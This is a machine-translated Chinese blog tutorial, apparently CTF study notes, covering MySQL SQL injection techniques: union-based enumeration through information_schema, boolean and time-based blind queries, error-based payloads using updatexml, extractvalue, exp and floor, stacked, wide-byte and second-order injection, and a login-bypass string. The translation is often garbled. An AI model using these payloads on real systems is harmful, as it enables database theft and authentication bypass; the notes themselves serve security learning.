当前位置:网站首页>Detailed summary of SQL injection
Detailed summary of SQL injection
2022-07-06 05:20:00 【-*Xiao Kai】
SQL Injection detailed summary
notes : Chicken notes , Reference as appropriate , Welcome to correct
SQL Principle of injection
When the filtering of user incoming data is not strict , The user can be in Web Form submission
or Enter the domain name
or ` The query submitted at the page request SQL sentence , Pass these query statements to the back-end data execution , Thus, the actual executed statement is different from the expected statement , Cause the original information of the database to leak , Tampering , Even delete .
sql keyword
- information_schema.tables Store the correspondence between table name and database name
- information_schema.columns Store the correspondence between field name and table name
notes : information_schema.tables In fact, it is selected information_schema In the library tables surface
step
One , Find the injection point
In the place where parameters will be submitted, if you pass sql After the statement , An error message will appear , It means that SQL sentence , Prove that this is the injection point
?id=1 or 1=1
?id=1 or 1=2
Two , Determine the field length
Determine the number of fields queried —— order by
' order by =n //1,2, 3, 4 ..... n When reporting a mistake , That there is n-1 A field
3、 ... and , Judge the display bit
Using federated queries (union select) To determine the display bit
union select 1,2,3,4,5,6,7…… // Numbers indicate the number of fields
Four , Look up the database name
union select 1,2,database()
5、 ... and , Look up the name of the table
union select 1,2,table_name from information_schema.tables where
table_schema=database()
6、 ... and , Look up the list name
union select 1,2,column_name from information_schema.columns where
table_name=' Table name ' and table_schema=database()
7、 ... and , Check the field value
union select 1, Field name , Field name from Table name
Injection point
1,cookie Inject : The injection point is cookie, adopt bp After grabbing the bag, you can cookie Submitted by
2,UA Inject (user agent): The injection point is user-agent It's about , adopt bp stay UA Submit at
3,refer Inject : The injection point is refer It's about
HTTP Referer yes header Part of , When the browser to web When the server sends the request , Usually with Referer, Tell the server which page is linked from , The server can therefore obtain some information for processing . The meaning of this sentence is , Only when you send a request to the browser , To bring with you referer
## Joint injection
Joint injection has characteristics **: The reason for using federated injection to write into the database ?**
answer : When using combined injection , If the data you query does not exist , Then a message with the content of null Virtual data , in other words ** When federating data that does not exist , The federated query will construct a virtual data .** So at this time, we can add the information we need during injection to achieve our purpose .
Reference resources :https://buuoj.cn/challenges#[GXYCTF2019]BabySQli
## Blind note
### Bull's blind note
- Boolean has obvious True Follow Flase, In other words, it will return according to your injected information Ture Follow Flase, There will be no previous error information .
### Time blind note
- There is only one return value of the page Ture, Regardless of the input recognition value , The return situation will be handled as normal . Add a specific time function , Judge whether the query statement is correct according to the return time of the page
The difference between Buer blind injection and time blind injection is , Boolean blind injection determines whether the injection statement is correct by the information returned from the page , Time blind annotation is judged by the return time of the page
### Blind functions are commonly used
- length() function Returns the length of the string
- substr() Intercepting string ( grammar :SUBSTR(str,pos,len);)
- scii() Return character's ascii code [ Change characters into numbers wei]
- sleep() Hang the program for a while n by n second
- if(expr1,expr2,expr3) Judgment statement If the first statement is correct, execute the second statement. If the third statement is incorrect
Injection statement comparison
and (length(database()))>1 // Bull's blind note
and if(ascii(substr(database(),1,1))>1,0,sleep(5)) // Time blind note
An error injection
Incoming sql The statement will echo through the error message , This method can be used when there is no echo bit
xpath Grammatical errors
- **Updatexml() **: to update XML file
and updatexml(1,concat(0x7e,(select database()),0x7e),1)
//updatexml( The goal is xml Content ,xml Document path , Updated content )
//0x7e:16 Base number , Express ~
By updating the xml Method of documentation , stay xml Write a query statement at the location of the document path
- extractvalue() : Inquire about xml Values in the document
and extractvalue(1,concat(0x7e,(SELECT database()),0x7e))
//extractvalue( Query target xml Content ,xpath Format string )
In general, it's cooperation and Or is it or The use of , He is different from joint inquiry , Don't care about the number of fields .
exp Report errors
notes : Such problems have not been solved yet , The details are not very clear
exp It's a mathematical function take e Of x Power , When we enter a value greater than 709 You're going to report a mistake Then take the opposite value, which will always be greater than 709 So wrong reporting , Applicable version :5.5.5,5.5.49, and mysql Recordable double The numerical range is limited , Once the result exceeds the range , Then the function reports an error ,~ The symbol is the operator , It means unary character inversion .
exp(~(select * from( Query statement )a))
union select exp(~(select * from(select database())a))
Nesting must be used here , Because without nesting select*from Cannot overflow large integer
floor() Report errors
floor() The reason for error injection is group by When inserting data into a temporary table , because rand() Multiple calculations lead to duplicate primary keys when inserting temporary tables , To report a mistake , And because before the error report concat() Medium SQL A statement or function is executed , Therefore, the statement reports an error and the thrown primary key is SQL The result of the execution of a statement or function .
mysql> select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'
mysql> select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'
mysql> select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a;
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'
Stack Injection
Stack Injection , seeing the name of a thing one thinks of its function , Is to stack statements together for query
The principle is simple ,mysql_multi_query() Support multiple sql sentence At the same time , That's it. ; Separate , Piles of execution sql sentence ,
select * from users;show databases;
Limitations of Stack Injection : The point is that not every environment can be implemented , May be affected by API Or restrictions not supported by the database engine , Of course, insufficient permissions can also explain why attackers can't modify data or call some programs .
Wide byte Injection
principle :MySQL In the use of GBK When coding , I think two characters are a Chinese character , for example %aa%5c
It's just one. Chinese characters .
Filter ’ The idea that is often used is to ’ Convert to \’
1,%df**’
urlencode(’) = %5c%27, So bypass the filter , Can be in %5c%27 Add %df, Turn into %df%5c%27,mysql stay GBK When coding ,%df%5c It will be parsed into a Chinese character ,%27 As a separate ’ Left outside , To bypass the filter
2, take \'
Medium \
To filter out
For example, we can construct %5c%5c%27
The situation of , hinder %5c
It will be %5c
Comment out . This is also bypass One way .
Easy to produce wide bytes php function :
replace()
addslaches(): Returns adding a backslash before a predefined character (\) String . Predefined characters :', " , \ . Use idea one ( Defend against this vulnerability , To put mysql_query Set to binary The way ) mysql_real_escape_string(): Escape the following characters : \x00 \n \r \ ’ " \x1a
The secondary injection
Hackers carefully construct SQL Statement into the database , The information reported by the database is rejected by other types SQL The attack behavior is triggered when the statement is called . Because the first time a hacker inserted into the database, it did not trigger harm , Instead, the attack will be triggered when other statements are called , This is the second injection .
UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'
Single quotation marks are directly used here username So when username Controllable words , Here is the existence SQL Injected , Suppose the user registers username The value of is :admin'#
, Then the complete statement at this time is :sql
UPDATE users SET PASSWORD='$pass' where username='admin'# and password='$curr_pass'
At this point, the semantics are completely changed , It was directly modified admin User's password .
Common query functions
Common query functions
① version() – Database version
② user() – Database users
③ database() – Current database
④ current_user() – Current user name
⑤ system_user() – System user name
⑥ session_user() – User name to connect to the database
⑦ @@basedir – Database installation directory
⑧ @@datadir – Database file storage directory
Small problems in question
1, Universal password :?username=admin’ or ‘1’='1# &password=1
2, limit 1.1: The second statement that displays the query results “ limit1.1 ” Is a condition , The function is to get the query result 1 A record after the result ,,
3,mysql in , When the data types on both sides of the equal sign are inconsistent, a cast will occur . When comparing strings with numbers , Character transfers are forcibly converted to numbers , Comparing eg: character string 1 Equal to the number , character string 1a Will be converted to 1, And 1 equal , And characters a Be coerced into 0 namely ‘a’=0 This method can be used to determine whether it is character type
4, If the two parameters compare , There is at least one NULL, The result is NULL, In addition to using NULL<=>NULL Returns the 1, No type conversion .
Both parameters are strings , Compare by string , No type conversion .
Both arguments are integers , Compare by integer , No type conversion .
If you don't compare with numbers , Then the hexadecimal value is treated as a binary string .
One parameter is decimal type , If the other parameter is decimal Or an integer , Will convert integers to decimal Then compare , If the other parameter is a floating-point number , It will put decimal Convert to floating point for comparison
In all other cases , Both parameters are converted to floating-point numbers for comparison .
5,sql Functions that may be used in statements
mid()--- Extract characters from text fields
limit()--- Return the first or middle rows of data
concat、concat_ws、group_concat
MySQL Of concat Function when connecting strings , As long as one of them is NULL, Then it will return to NULL
group_concat([DISTINCT] Fields to connect [Order BY ASC/DESC Sort field ] [Separator ' Separator '])
rand random number ( produce 0,1 Between random numbers )
right(),left() // This function can be used when the length of read data is limited
Reference article
SQL Injection principle and analysis (seebug.org)
SQL A detailed summary of injection usage ( From shallow to deep , Ongoing update )
边栏推荐
- nacos-高可用seata之TC搭建(02)
- JS quick start (II)
- The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
- Unity Vector3. Use and calculation principle of reflect
- Unity gets the width and height of Sprite
- Sliding window problem review
- Tetris
- Building intelligent gray-scale data system from 0 to 1: Taking vivo game center as an example
- 指針經典筆試題
- Simple understanding of interpreters and compilers
猜你喜欢
从0到1建设智能灰度数据体系:以vivo游戏中心为例
ByteDance program yuan teaches you how to brush algorithm questions: I'm not afraid of the interviewer tearing the code
[leetcode16] the sum of the nearest three numbers (double pointer)
【LeetCode】18、四数之和
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
图数据库ONgDB Release v-1.0.3
毕业设计游戏商城
03. 开发博客项目之登录
February 12 relativelayout
Golang -- TCP implements concurrency (server and client)
随机推荐
Compilation et connexion de shader dans games202 - webgl (comprendre la direction)
Review of double pointer problems
Huawei equipment is configured with OSPF and BFD linkage
SQLite add index
Three.js学习-光照和阴影(了解向)
C进阶-数据的存储(上)
注释、接续、转义等符号
Vite configures the development environment and production environment
指針經典筆試題
改善Jpopup以实现动态控制disable
Class inheritance in yyds dry inventory C
Cve-2019-11043 (PHP Remote Code Execution Vulnerability)
Postman manage test cases
Excel转换为Lua的配置文件
Postman Association
Pix2pix: image to image conversion using conditional countermeasure networks
Driver development - hellowdm driver
02. Develop data storage of blog project
February 12 relativelayout
JS quick start (II)